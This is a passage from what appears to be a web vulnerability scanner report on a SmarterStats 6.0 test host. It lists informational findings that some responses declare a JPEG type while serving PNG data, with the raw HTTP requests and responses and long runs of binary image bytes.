Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEDA3AB80"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d..!.IDATx^.].......bcc...1`.ec..\.[.s.f...........c..7....a!.+$..]qH..V+.....0...?.....W35.3.=..S]....Q......*...#........A.`..V...... .(!"1.A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@...............F....Zf.....M.6.l}8.^......A...JAD.0........jp....;. -_S~....^...TA@. .JAD.-.%.    U....$_ .h.e...w..A@.(.....".C>:..t.bH..p.DMGW...&...W../.ellL}...R.....6..._...\D...".A*.n...s.Hw..".A.(...(........!...(...!.n....f....m.,I>.qBD.(......!.,D..U.H.c.[.D.FD..E..iL..t......Q.+..{.N...BD}l.{.~.5k....i......."]6.i.$.n.....MZM!:u.:...Y...g.........BD.`(..S........y;u..1+..>C.....q.-&X...<.....YMBD..L.(D..Qg..RM.|.BD..$D..Qg!"6..IBD..L.(D..Qg.D...>S..pBj.C@.f}`."b......:D.}.....u......!"!"...-..S...O"z...."r.8...@.WG.N...>..._.B-.m7..HD$...P..
..C..'.-=.4.x.}X.#D$D.2...Bt..u.ID........2.!"!"...-..S...o"z...X.#D$D.2...Bt..u.ID.1."r.92X..Df.!:u.:."..|...1{...X. ..DD,C.[(D..Qg_D..|.....Od.......P..
..C....}:9..h..3X.#D$D.2...Bt..u.ED....D.v.<....    ...%o...:D.}...O=..h...Y.#D$D.2...Bt..u.ED..Y..h...Y.#D$D.2...Bt..u.ED...Tw.........{.(.....C....!.....j.UW..@""..X...P.N.....h..+.....6\y%.t....X...P.N......    ..P............U...!.....?.H.......q..DD.....e......3..\.vS.sp....`..#2.G.8",".8.U..:.4.u..
.j..}.$...c0.....rj    ..C..WDt.N;...:Jm..rN..q..6.p..O...=.-!".9.
..C....a........5C$3\......h7...V.c....$c.....>.\I.N...>..$...... ...;U.......^M..I.....60..[zU.....6^{-..T.......h.'......t.X._......u......u.^...uEB.)3.....)...f.....#2.u2~...BI)D..Qg.D45:.#...^.6_=..J..M..S..)...X..<...T..g3..Y...d..eCN.Bt..u.AD&.~..k.f...\. "...2..z3R.r7..!".N..Bt..u.ADHxED.....o..e....M.....</!.<...;D..Qg.D......]wU[..Nm..oXF.(...m`!!..!dW..S....".......h...Y6 D..&!".9.
..C............4u....X.!D$D.2...Bt..u.AD.....5.}....LG.H..e(y....!............4k......#]..1....S...."ZD.....k".~.-,...H""...-..S....".....y?C..o...Y.#D$D.2...Bt..u............NP3......Y.#D$D.2...Bt..u...L......D..id.........!..7....5t...m....Ho|...H""...-..S..s.D......}8...+...........!..7......q.6........&!D........!..7....ABBD..C.....jBt..u....y...wT3.i>.......2F..$!".9.
..C.9o"ZFI..v.E.\v..BD..C.....*Bt..u....y.w....    .l.....2k68P.j...C.9o"B..}{....6.(.$.~p...hp..5...!..7.=L+..R...K..e.o.2.YG$...P..
..C.9o"B.....$D..a$"r.f..Bt..u........=.0....u.&;4..DBD.c..!D..Q......_9.H!"..s...8(..    ..C.9O"2    .+.>Zm.."].....;.....rk...C.9O".....3{...C'":&h.}p"@.>|..s.....vwq....'Xwbh2..i..-.k.....f.].Y3...S^.D.bj....F.GKG.m..\"".9.
..C.9....5..Yg.i:...._..e.%!".    u.%.......>..hh...0.o.{.#..X6.D(D..Q.<..d.o...P...r.....QR...R7.P_NQ...w.....>.......@l ...../j..;.i......_..P.$"J ".J.....h...l    'I^""...&.bt...yFD+h...v....>........._...D...%.....%7...:D..$"$......F..Y.......4...z#"
...f....k.n............:D..$.'.=W.G..s...Z..}..:..d........s##Xw...^.._M...*...7.*Y...rCf.^.9.|/.5...h.!:u.:...........Q7..7)=s..%......N.....C.Q..?.U>.5k..E.i.h.)n..?.q.$!"78rj    ..C.9......~..".(28.......3,.....v    ..C.9/"2    ...~..|.y.....q..........s&..F9e....K.N...y..Ix}.... ..........^.8..k...C....9.n.!.6.&....NR.h.....].j..#".3....._....!.......u..Z..u'...M...a.x.....yu...!.......I...t.9....kY..1"2[vD.R....wJ.<K......5@.N...y..NxE.k......hnE>I.&D$D...!.6::..;.Q..>..l.....e..Xu./$D..    Ct..u.+".    ....6.k.)[...eD........un....dB "....).._...ZH.nc...%{.....5v.O..a.h.,.g..,.....%.?_}U.z......$.u.k$.>...j..gv..|#".]..@D..h.S^...........@NH.C.T.K.._k..m.....D..5.....q.|..h..g....9F...N.....>..r........>....6\Hx}...{|e...X.f.#.......t}7b....5A.Ho.....{......8........X......X.(...DDg4.+/...h..e..P..Nq.k.2. X7.k%....=.2s..,|%".....6....;..0XW.K.._+...?.....UG.%D...i":.........(...8G..._.`...$..M....2s......(-"b...4V...+o...z.B..y..Y.`.....MP..3.Uh...^.....}Oa.Q..8......X...#.G..'3._.j.7...Q.    ..... ..a...(z].8.?;...X#....BD9...h..SXe=.8........9../X7.^v..zM]..l..2V..,".!..9jIg.E...s..D...(..+L...9../X7.....%..q....w..Q.i. ..v..,.9.5".t/..f.:":.dvy..Cu.........'.s..^.n`..&t...^.|e......$....zOp....^...z.!.,{.....%..O<Q....E].......X/..O.....\ "c<.....VC]....SS...D"...)..d..u..u.s.C^.n`.<..~..X?.r.%..)IDT."....'..bCB.}.....m[.^."I......a.q..........5...S.e.V..a........|.]#.\.`..3{.r...dNDD..5FO...G..s.i...c.M.....m... ..+......`..3...8?.r....)u...F7.p.R......^.....{..F,+.=...:*.../X..RH..%......yfk...9DD|#....._<.$.h..gl.j...D.....8.?...v..:..4.O...#...M....!...mI.....o...}_............$?..D...4..|..8........`_...m.).u#...q%..4.c\.1"F.y. D.F3    ........u##X+...........Tl-...;.s............`......vK..../d5.DD}`.....=....g.L..e.N...F....g...."r`j...=6s.k&.....s8hxf.....M<....>2=>.M..R".DDY....z!m..m.|]......j ...Y:.5.G....#".D&...........BD...Y.`....K....#..\.BS"...h@"z.9{..=...dP!q.A..._u..yf.P.....n.%uDD+F.-.w.U-...>.......<.U....""ZIc.I>2=o..a..."".D....E.ao....;G..F..:....i.^K    .BD9Z."..tz...4..F.as.<#..;G...Su..6.......>.Y"..M.%......"..vp.k_..;.......Xc.-.s........%5..y..2F.S.M.h.oM'..........]E.....Iyf.|d......1..1..G..\..i..'........ffX.....sp0r%Su...T.<.~.....Xp...@D..^.iO,x.Q..
uqU.9\`....X#.c    ..    .q-&....Q..gYC3jH.....nZ..#cSg...X.f.R.Y?..|..,l%"J..r&"4.2Z..1#l25.Uu...?....52....`!"... ...C...QF...b.c..#C3g...X#e    .......l:.......DD>H..X~...a.FGY.$Te.....7W.kL..^_...~>"D....o...m........s8hr.*...YU.&-G.....>...DDi..G"zl..........x.BU....^GI.BD..*.*..Q.....y.. ..U.9r6..........}..R}c.Yg......D.q..)....p.u..+.=.D..}].|..:.-.Ue...Y......4u?B.fi..9@Dtv......1....#...'<B..BO.e..;..).$.Ue...Y............1.76.y&...GDt..p].....1....q,...A ..$.4....,...1.Fd]i]e.`Y.C.*c.-b..1.4....tT.....R7..........Q.....]2S..v......5.<...."....f.m....i1c..O.~:......T.j...1^.h'z..N.|...R0>.X...w.q.*.Y..P..X....hr%.76.q.....Q...h....u...l...."!.........,kw,TU....;..(.76.NDz6.5M.......`.}3Q..)5..m.3X..E(..3..F......:.c.aUWU......9~.1....B..}..@8..[.....r..]V.9Q .,.....,.p,TU.q..........U..
.k.y..z.5v.y..2.....Zf...4..^..Z..:.5P.n.*.8....wg...&"...cV6:0..*4...\@....O.^Uu.[.\.W.k.u?J.L8~...SYP........&".N.(..:..b.YZ...ASg...X.d..4|........V...LE....=.mO...s.,=..*b...0l...9."......D...(k.    ...6V.9<.C.c.....W......Ol<.dV.HD....@B......1CasU.9l.q)[E.1P.0...D...R.BD.>._Tyh.].rzl.*:.>.e..5...-...{.}b...8.DD).QQ$......6..U.98F..L....6..*.............%]TY.......z.U5.....\...>YXQm..BD.,.h"B...q.&...spq.C....D^..&.......|0..d...d.Oy.BD.7.]...h[."..:f...q..F..?/....[........M..>LYR...Eo....h.....N:.e22F.6FT0.=MK.m.`....Rr.
Q.<u..f.>....?h.3........s,t..7.n.,z...7i.@.(gg..^GD.......{[%.f12...>.D....8=Hg.?b. ..DN...^Y..2.;.ht[_.:.D.....DD....Y&.$....P?...,%g....CgCB.S..m.g{/7..Y32..Ul.F....<J..l}aR.(S.u....=.C..^J..n.okd.......v..!..........=H....a.......D...J]D[_.dFn...ED.....i:-.;Ndkd.F..|.z.....`.oS.....{.....n.Q.7u...1.....x....e*..h...YOdkd.`rRE.z..y.-........p..i.*..O''...Fot.0h.(.......<.x.n...ED.......]Odcd,..$....t~.O.d.0u.l..v.H..m7Mi..YM....~.."r.@...Qc...G....3.#s...*B.{P..P.$.....66.\.a...F.'.=W..e.o.q..lD"...h...e(/6.-..12..x..To.....V....<......sfy.At6$....j_#.K..O.M..z.S.........c.eA+D....m.'J...kd,.H.B.6fRV.q.z....Go..l7p..:.. fl.....
....DF.    ......lH..........t>..9.Wo..a@...UO!"N.......fY.r/-p.#e[.........m....7.r..o,..CL..ZM-..2.>x>.IF....v....
...Q.{..!.R..^..zHm[....XY[......OIE$............>b......p.s.]......<`).;....9...DDi..Cc..Aq..f.l..7'j=.b.6.........3.^.F/.\.fR..m.7..%...".+........R.^+....g..X.bZ.t;}E.=w.9.M...u....}.....~=.`A@.R.~<..4z....>D.R....i...)../...ST.W_........ iD..I...0....'............ .....o.h.u.Z.P......Q.Y'...'.#"8[.
.....S.0....,.f.....G.....r".w`..8.$....GI_......Q.qv..g..U".{..9..'...V'.?t[A..{....A...6.o.p...    ....^h'....L..md.^.:A/...1.....w$UGs..-.{t4d..q.BDq..q.,N.m...@Ze$.q2 CF......A....N.]VQ.2.Q.......!.DU.....o..;...dW..Z.....i.m.61.....2.M.(.}^..........w.t......7...\.,D.C........t..- .    j.2.w..^%#z.....UU'..(..C...C.....?.....M.=@...]@..
...}..}4..].1........Q..x...\...Q..LQ...u.q."bDD*.........!.]...{...b..m.........,]3..%....x..w.:.6..w..f.c.zB....V.^.:8..Qg....!.\V..ED.
6.....(,...@..(.v....9.....n^y9A .....h'.R..............@."D.t...h.    .H5Jt.uo............~..F2.UL......x]i:..k.    ....b.k...7...o..<.E....0..tK..y.
...;b,f....n.>..D.....ERC.2..S.........~sMD.9q-
.....%.).R......4AW.....I....."...S.#..1,...W..Dd..p.hD..-...j...+.l.:.O....d.u.^.FD.z....V..k<..E.E...j.:...n....W..GD1..2.]."2o.........5Y....=...&j....S"....H...j.:.f...F.vW2.k.7""B.a........>5"*H..{...(..:VZ...EI%......t..I..H.;..9... ..-J....<...B....u.X.&).v.9@D...F.Dr.1...Vdl...%"..E.............7.(jx.#...C...e..D...J..o.....v.~Qi.o^..#y.?..z."....Q*    5.....i.h..0...............z.E..Muu.;...Z.E.8.9..q.............8V.7..=..o*U..Y.t.P..Y..R.k3..9.t..D.];:}........t.I.J.K%.....4#"j.......:..6..c.ic..w...y...Q...... P......
.. Pq...*n....@..."*C+...@...".......e@@.... :...G@.... ./....!.2... .T..!...... P......
.. Pq...*n....@..."*C+...@...".......e@...w..A=.......IEND.B`.

10.37. http://vulnerable.smarterstats.6.0.host:9999/Temp/AboutThisFolder.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/AboutThisFolder.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /Temp/AboutThisFolder.txt HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Temp/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:30:44 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: "1CB66497A424400"
Vary: Accept-Encoding
Content-Type: text/plain
Content-Length: 61
Connection: Close

...This file is necessary to aid the creation of this folder.

10.38. http://vulnerable.smarterstats.6.0.host:9999/Temp/a1b92ef93b1b4be78245313c2d051569.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/a1b92ef93b1b4be78245313c2d051569.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/a1b92ef93b1b4be78245313c2d051569.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:06:01 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB697FB9D99A80"
Content-Type: image/jpeg
Content-Length: 10437
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d..(ZIDATx^.]...U.._Q.....dp.    .....""..........F"..3.B.$!..@.!$.y8.&.....%V.Q.*.........O.s.....t.>'..v......k.......{.\"...H...xO../..    ..D.J.H.@$ ..........@$ .."...    .....!..w...    ....D.D."..K@...] .D.".!"....H....".{.....H
"j.....v..8Y.+''FK...].\$ ..O..'......Pm.9.&FGU....P.#c.U.c..../.D."..@..(.-56.MD.z......K...D.qJ .".C...Y.p.....2.{......6n...-[....~[..@t.....?.a1_4D.F..Yw...p..WI.d4...t..A.Y.v.......!(M.N.2..U.."..@.O.c....}....D.'..GT.!.S&X..#......#rSn..c5.N[.;GJfu.ND.......@8z.,..J..}L....)...b.>.h..X....U....D:eo.p.;..L...n...i.`.H..N.DD...|...i..BD|Y..)..K.f..U......]j...H...X.......Y.!"........-..C....U.BDBD.....X..4....Y.!"!"3..T[... .........U.O.X..:....Y.!"!"3..T[../......5c......7%7yP...iC/..krR..........X.....d*..    ...............;...K/U...^...OW.~.M...:..n
T.H..Tg.... 8....ms........~{..'o...O..YJ}z..#...{e.!Z.+..>.y..%......Z|.Ej......^a7.*..xD.:..~...i\/.#@._4$.t.M    ....W.X.....6.....l....X...^`?.aCBD...G.......}-....^`...XG.H..Fo.... 8...M..z..3..B.u..    ......;G.BD%R.........ApZ...O~.[...}.%..O~....+Wr V...v.....Gd.7...j......_..@...........".L.....6.....l....X......~..........m.........\...m.E@D.s..2.....#c...rT.d..U~..B.3VS..v...,..?.<.!.....-...Q....0..L..2.VHIbD..c_...iQh.....":....7~..Ny.....+..@........N......y.i..*lBDn.fswhc....'4v..:KB..*Z........-..{D9...J...Nhf.6..1M.(Dd.&.... 8-.}..?T...A..lYw.U...r..n.-."..(+4.).3.../Bjj."....G..."2.A..|.....|...6.*k.........J9]GBe..b.h....7.q._f..=4.9....i..._.*W..rKBD.f.^......G. ..l....3.J..VO....Ap.......VB6.iK..DD....;......
......;....G:.f.L...`.3..    K...*dwo...iMH.z.~.w..^....i.w...:$v.........K.....U....*n.+$vl..............:$..>..=b".L....U....*..D...Y..:..._......3.VW.*....I....C3..>)V.....=..?.\../~QZ..>[=u.]...uBb...C.....{..|I...X...........tN.q".....4......-&.'..    A..E..... 8.    ......z.VP....K..O}J......-&!.TrBD.*dwo...iMH..F?w.5.D........^!..b."."r...{c5.N.Ba..To........L.....<Ba.......dh..CV..j......c`A2{...*".x.uI.,|..Ba....G.H..U..... 8.    .].!:t...8..RV..xcBD.s...jW.P...dn."."r.!..c5.NcBa..T......[......#7..5HI...jd~...iI(.8.v...:F..W.)........l.P.m.... 5!"W52.?V...$.v.......%..i1..~.P.9r..H<"W=.~...ih(.H1...>.......e.Y(...    .    ......c5.NCCaGJ.q:....f.v.B.F.+.v.,24.....8...Ap....>.....?F;..._>.!.,m...B`..Q.Gf.H".#..Jf... 8.....B...l$..9..
..#..:BDBDM:...X.....q.b...Y.c....,:.|...!.sd.TG.H..IG....Ap........":v...e......92k.....2..ft.._&...5....c5.NKC`G............6.Y....5..;..2.....q..`M.^!!.&5..{...ii..8...ct.uS..cBl7.....YS...Q.`.d2?...._%.!.&5..{...ii..8.l)-f|..?h,.........n.N... Jn...*2..&R../D.Ce.<#V.....v.v...3r.h..W......^!..b(......7.AD..U...(c) .u...5.y.T.Q.u.?.eK4...8T.^ehV.........T.h.o.z1....V.}...e.%_...."..7v..W...G...j..5.L$jL......7.... 8..]/f..p...m......;G^.:}'"n.W../..X..I...w..H/f<p.m...}.....hj..&1w.....NDu..L..z..b5!.T.!....by...m$!MT.;.c.{.D$.^..9.Qp...N...i.o........YC.2...W...........|...9...Ax...j............$.zs.:.j..o..yq.D..q...#D.G.&O.. 8m..=Y.x...(....e.z.7v..8u..HJBD.UQj..7.....ZC.U.+V....7v,f\E...$.z...lRO...........GO....N......6....b5..0|c.<..K...w..<(.-kz..n.~...HL<.fuZD.....L.......&...b5.fI......H.6L...K.Q..L.X....xD...d~.j?...(...7]..s...{.*.j........J2.l.e..10.|b7}w]}!"!.F}..v....6.xG6_d..X.Q...9..u..'rI.....6G..*w!"!.F....bCG...S6..M...:.xY.X.........&(+[....Mw...........Q...9.....'}..H.):..vu...fD.5D.(+GV..?..I$D....SA...}...]~.z......g.i5.,D4#odw]...w..(...o..W.v..G.1/    .Uw..aL...Wo.=WV............Ap...;.......l.....'D.:.Idr..n.....C.dW...:Io....k5.:.........?...........*.G4#o....Q.......(.!%..Y?.s.....deuM_`....s....b9H.h.q.X............|...e..M...v.wr.:zD .1..'....2...o........i..
.QY..G>b.'.. 8....>.m...V..J....G..v..L.8.Qv8.....S#t....L...nH.._......
..UVl.D!q.K.w./.....29@..*...}..g...............D.xG.U.#*.".Ba({(0Ze.[h........GY}a.k.lH..`....&./.&...u$...Y.eU.@.}.!.r.....(..
..-+......"p...1'.Eih[%...#vg....v..L.X...f$..U.t&..........x......e].l!.r.#.(..5..M.(V..../.8Re).!j.o.. .Gi=......;9u-.H?.........3.....T...."*..b.v%.r.-.e9e(EP.... 8m..}.....0.. ...!w..~..s.dR...L^UUW{Bu.F..xX........K.k\8..1..n..,V..h...H....s............X..&..!Z.0.b..Y
..{..)3..,....R.......8).%.k}....V...:..........k..6wn..GA"1.di..v.9DM...}-...3bhO.......H.G.,    .!6..@@....#.|..ut.-...P....&38>.
~k....]o....,....3.Q .......w.....L^..k.o..|41U....}...=....i....i.T..........GB>....&....wZ....d.........$"..Y.....&.df..B.1..Gd....................a.....Apt..vS....K.Q X...|`.....%..^...x....HD...M.g.m....&......e.....:!N........Ap...;...Erd[Ug..W./&...##.:..Q7tI9......3f.t.2.P.)..a....P..%.^....\p.ZI.^\...k.G. ...|`....^.D$).9..B..ah.1c......t?...\!ps....+...=....-........Z...,W....V....[.P]bDy....=.+..P0....s.j.....V ....K....5.......H......g...t.2)..P.;...A...:D.5D.2....    .^..b..%...5...=!..L....cv.rm..].....E.....W. z...l..b8<...,...].SG.(.W....1.1..O;.e....O.r..3..:.,+....a...S4..+v.{L.    ....Kg..3.>p.f.L.B...Y...Ap...;..X......./ o..@\.s.cSG.H.(.7z...Z.kJB...2R`....1V....+.d......[..x.&;.].s.cSG.H.(.7:....g.i..i...l.s..X.cD...z    D.....|..<F3.BD.^..:.#..$}*.4-..1...=jM39...U....QKh.."Z.dr...Z.`.x.t...|..h.......w....H<...$.T:..0-..-..>.q=....w. .R....:d.O....../.....].O.V.....`5xX.$...C.U.H.(._..(2n.#...o...a.z.....}W_.xbXz..r..U.IbD:^.E........[.....r."."....|]MG.......I3{..'.a..-J....../L.2.......f%...l...p.eFmv..D.R.BD...<f..+.j(s).V.w.j.....8..N.^.i./S.r...<L....W..5=...;w........J...D..5n).`..T,...FC.C4Ds)+h6..UU....>.p'....|.....S.....C_`t.m....Q ...24s....c..d
40.....E.Ez.....r5.-4+.aR..D.....^W.'.9...&Bw...}i..*_}.d..........L..G.zD......]..b...s9D.T..2.Y.v.W..p<F...q...Z....b..<K.]....d..-..z,D.!"."....ba..#......(........0...t)...3[....-.`.%c<....nK..-..v....gz5=...~.@14.,....6...Xz....E...C..lL..).......;..*.Z.^............'..9..rw..b.!..gDBD.^..f:..#.kU.
I..0.a..7t.p..K.r_kOF..Ie_k..x...*c...Ty....>..'    .Y.h!'w..-..r.>3."j..j...&.........+TCw.....K/.;@.0....T..*.......`..u.....k]=[..[%.vO...A[1..\..9.v....i....L2..dz....?.cG..3.H!..Z..#9Hkq|.g........['O....).y...c>F..@.>..g=F.....}...3.*..iFW..e..C....qLa....../...Z.m$.4...
f/[.z....OuXu....om..3|....-.U..#x..l.s..Rg =....6C.....q.^.Ur.0_...s.......9......b... .Z..DpM8.h)B...v=..B.OS.q..B..`...U..."2....Vc.7......G...G0h..}(....N.y....d.6.c...gw......98.....l...?6....v.:...........5=#b"...BO... -.V.....b.h.9..2.Qv.9...mqw..../........E.n.]o..A..-..5.$Bx.\9......a.2..4).VJx.dW....6F..4...t..*.....*.R.9{........{.....`..)).........TL....r.no3.N.. .0.}.c.R.j...l."..kr@..hq d.... -.G...mpca$.n!...s    .RU....
...3.N.n.z{..........L...#2i.K]..t./....5....u..b!n.rx..M.....jkc...Ts1<......./.[.|.B...M.....of#wo..y...    '!".L.|..3.....w.*.<.....S........4...3..I.G.    3..'.O.<...;.p    ...3w...&.....Q...O.6r....    ...Q,..0..a.V
..2..s..3....\F.....O..}N..`..m-...b....s...`w.O..BD..h#.4..t..b!..SL..(.. ..1.|A7.a...*[.....LpC..@5...3...l.)v=u.<M..b.._@k.8..L....K]!.......s:.E....(...H..D@0.et..>..p..g==<....HOo..gHD{.C.|.L.wN...?L.s.#(?..v..R"z..x..C.=...x...3
,Cx..".|4..&c.....^Ig.!@~..    #..D0.D<..3.g.C..2%".d...i/t..d..S.M.....Q    ..O.6.......<zT!..C..+..I=...<....{.o...].%ZY.\/..k.....K.#O...3....=.m..{.*..3v...l.s.[.N.45..{..|..D..._...N.6.n..~.......a.V(.....G..ho.....HE.._G(.K..X.)...#.h.y.&....)Pm....0C8..~...bj..8,..{[....).F..DM.....Q    ......W.{.~.i5+...    JG.Y_.<3x;YO.!Z...\O_.-.t.(k,u......=:u........"...L...}.$.i.."XNN7S..t..9BD.....r.,...7N.....k.....^    ..3.Z.A0>...........M..,.A..$.MV..`.v....u9y.u.E........u?N[h\.......]&.9..UG.H..."..)..YC.h.T0..B.&}.j
.....7~.=..YJ.!.........?A.....~..F].7....V..}..yU..&@&...Oz..1.....;.4...    .&9..]....t.6.....K....L..wM.<+.B0.[I...bU!............F}F.e>.......$......1ko...........{c.x. D....L. NT......c    bB%..o..AA...iB...@...y..w.....iv.CdxP>.>I$.2..o..L.Y/;....Y...&.=.L....j..$Rw..&....j.ca.3*.
`.{.`.0.)..9.H.m.K....e..)j...l.%....2ZJ.0 {LLpg.L.9IZI.....=....4."C.F....6.. .(....N..3..@2e.f..........1..B.c..3..3....._....)xZDZ.......'g&.....m1y...g...>..4."..g.Q%DDdQ,.4.X...c........Y..0.~L..t.Bl._..DN..8...:.D0.H& .2..Cc..../R0..3.<..w.]........<......t..k.........$...j_l....Zc#jdd.....4=B........#(....S...=J.`..g.rAqz.....$........E...P/....xGU.0.....u.q....c.....8.....C..{.......2.]..3..[!........A....7Tq_.....r^Q....]7S|..r........*...D..o#....I..a..]..O.$..f.f..ce*k..n]Ym@......P.D...`.....ubY...X..zu...{..%/....B....a\.m......&.h.. 3...z0=........z...Pg..G...n.Ll.....%.*.k0.(.|2C...L./...:._G=<..v(.F...J.N...`..3...@..0|.#.........tbz.e........4...'>. ....
2.C..6.r..`.Qk..Cc*.)................|.*..t[..]............e...z"..xbC5.......fYBZz.
....U.l.].....a..S.+AB.1.R...4.0.zu.t...r...iW.1Q.....FY......EC....%.r#6.....}.........~.)0.d.......f,,...@xD....&.H..h.#2..[......,O...k]WO~.....g#..........s.............J[F.."j;A..Q..<N.3.e.m>......"9=.).....-x%...g.....2.lJp[B...S.\.V.g.10D.*....'.O.;)".S.X..>...b
..U...G...j.......(&s.%..k...\BD$%!"! [..C.;....Sve..4..(..m....V.k.L.F....BxU ........p.!"MD.B.."2.......:....A>G...E.&i....V.s6..[.D-.YA...w
..8.V......Jr.!"!..1...ze:..!...b!&.;f.El.P....A!..O}.....".......K.H...F...A.V......44.D}ZN.I.G.G_.aVM/2]Lq.M..r.w..[q.!"!".Bq.N.\.v...v.O.....NR...x..bJd.M....J..&...84..I....RD.....I
0. ..o.|....@.N.......z.%.G.zDS$|)"....:p....\BDBDB...
..BD........G..@t......:.%.G.="Q@.
(...6............`......_.8t..,K..(%.I"")"....:pP..E...h..GH.........\.2D...G$D$D,:.]...X<<.#.......D.......fY.xD.#.".".....BD,..xDt(.......W.8...*.l.?a.^HH.Xt.....DT....K....X.)"....:0}.U...P.....UID.....1.<....!....<h.DD.z....D......W.GTGD.L.K..U...."2.....k..."...JM]..f.z*.A...&.....P..*3.V.n..m~....*.A.......|8...d2}._..D..H.D.CKD&B.."..@% D._...E.".......H@$.w    .......H@$0dDtRM...V._..#j.....f.9v.}K....\.d.H.}X I..y.7Mj....G.x./..d. .vd.^.'..h]j.7..>.IV...3#eJ.1v..!""(tF9`.....1Ig..&..D..ccj,.D.gt..........B.....ctx..[....m.A...t...o..y=..W..$..9\..o....=..!!".E.Qd=..w........i.N........r.<...Q..Y.+w.b.[.w.^.X..c.n.8q........I...|.b.>|D.[TCDe..o.o)...H....f...p...Q...".X.v.)/....U{."k...T..j="...JO._...Tx...Q...m......r..t..9R.vZ..3.
.e.. D...f<:...(...HD..C..J...gIH.Gz...Q.A.LI.M{si.t&...o...)..5..L..$H.!.6.e.-.GT..ROB.db.[..............^s.....s=...?..Q.~..)..5.P[......Y..n7....-.G.7.v...-&.3.Y....^.....er..|...\..z..^1d]..*#.^c?U<..T.H..YUL).......A. ".K.s.5....K........z.'nR..Y).%..........f...Wi.2b...C.#...._D."..% D..    B...K@.h..X.(.._.BD... .    .........."..% D..    B...K@.h..X.(.._.BD... .    .........."..% D..    B...K@.h..X.(.._.BD... .    .........."..%..}4..........IEND.B`.

10.39. http://vulnerable.smarterstats.6.0.host:9999/Temp/a61092b27bce47aa8accac88254b740c.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/a61092b27bce47aa8accac88254b740c.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/a61092b27bce47aa8accac88254b740c.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:31:53 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BAE755A80"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG
.
